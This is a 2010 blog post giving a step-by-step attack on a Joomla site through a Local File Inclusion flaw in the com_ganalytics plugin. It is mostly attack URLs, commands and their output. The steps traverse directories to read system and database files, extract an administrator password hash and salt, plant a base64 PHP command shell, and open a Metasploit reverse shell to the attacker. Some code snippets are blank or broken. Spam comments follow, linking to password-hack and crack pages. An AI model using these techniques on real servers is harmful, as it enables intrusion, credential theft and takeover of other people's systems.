2010/10/21

New metode and style hack windows server using LFI and new type of backdoor (.exe)



Local File Inclusion attacks are among the most common vulnerabilities seen against web applications. Because they’re thought to be relatively benign, most organizations dismiss the large security risk they potentially create. In this paper I’ll present an attack against a site where the only known vulnerability is a web application that’s vulnerable to Local File Inclusion.

The host is a Windows system running XAMP to supply Apache, MySQL and PHP. The site is running the Joomla! web application and has a single vulnerable plugin installed: com_ganalytics. This is the Google Analytics plugin used by Joomla site operators to track site usage.

The vulnerable piece of code that makes LFI possible is found in the ganalytics.php file. It’s the following:

if($controller = JRequest::getVar(‘controller’)) {
require_once (JPATH_COMPONENT.DS.’controllers’.DS.$controller.’.php’);
}

The ‘controller‘ parameter accepts the path passed to it without any verification. This small mistake will allow an attacker to traverse the entire file system.

I was able to use this code in the following manner to read files on the local machine.

http://localhost/joomla/index.php?option=com_ganalytics&controller=..\..\..\..\..\..\..\..\boot.ini%00

This returned the following in my browser…

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=”Microsoft Windows XP Professional” /noexecute=optin /fastdetect

Nice…

After a bit of research about the Joomla database layout, I learned that the jos_users table is the one that contains the user information. Everything from the password hashes and salts to user email addresses are kept in that table.

Using the same directory traversal used earlier, we’ll attempt to read the MySQL data file containing user credentials using the following:

http://localhost/joomla/index.php?option=com_ganalytics&controller=..\..\..\..\..\..\..\..\..\xamp\mysql\data\joomla\jos_users.MYD%00

with the following result…

þ>��� Administrator admin administrator@localhost-db.comA115def1b208327f20d85b65aa7dc2440:UjSCPIknGXkz6v2zePVeWK3r0XPbsS5I Super Administrator 9²þG ��ìnH H ���m�admin_language=language= editor= helpsite= timezone=0 ��

The red highlighted portion of the above output is the important part. This is the Joomla site administator’s password hash and salt separated by a colon.

hash=115def1b208327f20d85b65aa7dc2440
salt=UjSCPIknGXkz6v2zePVeWK3r0XPbsS5I

After a bit of research at the following site ‘http://forum.joomla.org/viewtopic.php?f=432&t=207689‘ we learn about how the joomla password is calculated.

It is an md5 digest of the ‘cleartext password+salt‘

With this knowledge the easiest way into the administrative interface is probably to brute force the administrator password.

We navigate to the administator account settings page and start looking for a location to inject the following PHP code that would allow us to execute commands on the local system.



We use the Tamper Data Firefox plugin to inject the PHP base64 decode shell into the ‘language’ field.

At this point we now have the ability to run commands on the system. The process of doing so involves the following

* base64 encoding our command
* injecting the base64 encoded text into the ‘cmd’ parameter
* running the command by calling the base64 decoder shell that we injected into the database.

So let’s give it a shot. We’ll base64 encode the “dir” command

http://localhost/joomla/index.php?option=com_ganalytics&cmd=ZGlyCg==&controller=..\..\..\..\..\..\..\..\..\xamp\mysql\data\joomla\jos_users.MYD

with the following result:

(sorry hidden for Privacy)


Nice. The next step is to get something a bit more ‘potent’ on the system so that we get shell access.

We’re going to make use of PHP’s $_FILES variable to create a file uploader that we can use to put our payload on the local file system.

root@bt:~/ctp/traversal/joomla# cat upload.php

$upload="echo \"\" > d.php";
$output=base64_encode($upload);
echo $output;
?>

ok now we try to pop up the shell

root@bt:~/ctp/traversal/joomla# echo shell.exe | base64
c2hlbGwuZXhlCg==
root@bt:~/ctp/traversal/joomla#

http://localhost/joomla/index.php?option=com_ganalytics&cmd=c2hlbGwuZXhlCg==&controller=..\..\..\..\..\..\..\..\..\xamp\mysql\data\joomla\jos_users.MYD%00


Meanwhile on the attacking machine…

msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.77.236:443
[*] Starting the payload handler…
[*] Sending stage (748032 bytes) to 172.16.77.246
[*] Meterpreter session 2 opened (172.16.77.236:443 -> 172.16.77.246:1682)

meterpreter > getuid
Server username: JOOMLA\Administrator
meterpreter > shell
Process 2640 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\xamp\htdocs\joomla>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : example.com
IP Address. . . . . . . . . . . . : 172.16.77.246
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.77.8

C:\xamp\htdocs>

Game Over..!!!


At this point attacker can use this machine as pivot to attack other machines within the network, install trojans, place rogue code on the webserver, etc.. The only limit is how creative they are. So the next time you run that vulnerability scanner against your web application farm, don’t be so quick to dismiss the potential damage of the RFI/LFI results.

17 comments:

  1. Excellent blog!! Such an interesting content to read, your idea made to take Web Designing Certifications. Keep updating more ideas. Thank you.
    Regards:
    web design training chennai
    Best web designing institute in chennai

    ReplyDelete
  2. This comment has been removed by the author.

    ReplyDelete
  3. This comment has been removed by the author.

    ReplyDelete
  4. Nice post. I learn something totally new and challenging on blogs I stumbleupon on a daily basis. It's always exciting to read articles from other writers and use something from their sites.
    Click here to get More information.

    ReplyDelete
  5. In this each step have a wonderful explaination...Under the Post Office Act 1854, India POstal service improved and paved a path for Postal Recruitment 2020 in India. With the increasing post offices, the number of employees was also required. Hence, India Post offers various vacant posts each year in different states...

    ReplyDelete
  6. Learned a lot of new things in this post. This post gives a piece of excellent information. Web Design Company in Delhi

    ReplyDelete
  7. keep up the good work. this is an Assam post. this to helpful, i have reading here all post. i am impressed. thank you. this is our digital marketing training center. This is an online certificate course nice pge

    Ai & Artificial Intelligence Course in Chennai
    PHP Training in Chennai
    Ethical Hacking Course in Chennai Blue Prism Training in Chennai
    UiPath Training in Chennai

    ReplyDelete
  8. very pleasant say. I just found your weblog and needed to pitch that i've beyond question appreciated perusing your weblog posts. After each wiped out buy in on your feed and that I dream you compose inside a similar way as again rapidly! Online Wifi Password Hack

    ReplyDelete
  9. You have accomplished an inescapable interaction upon this article. Its completely legitimate and strongly subjective. you have even figured out how to make it comprehensible and clean to get to. you have a couple of legitimate composing capability. much thanks to you subsequently much. Windows 10 Crack

    ReplyDelete
  10. Happy birthday to my incredible, great, stunning and super-attractive sister! If I am told to choose another sister. Birthday Wish For Sister

    ReplyDelete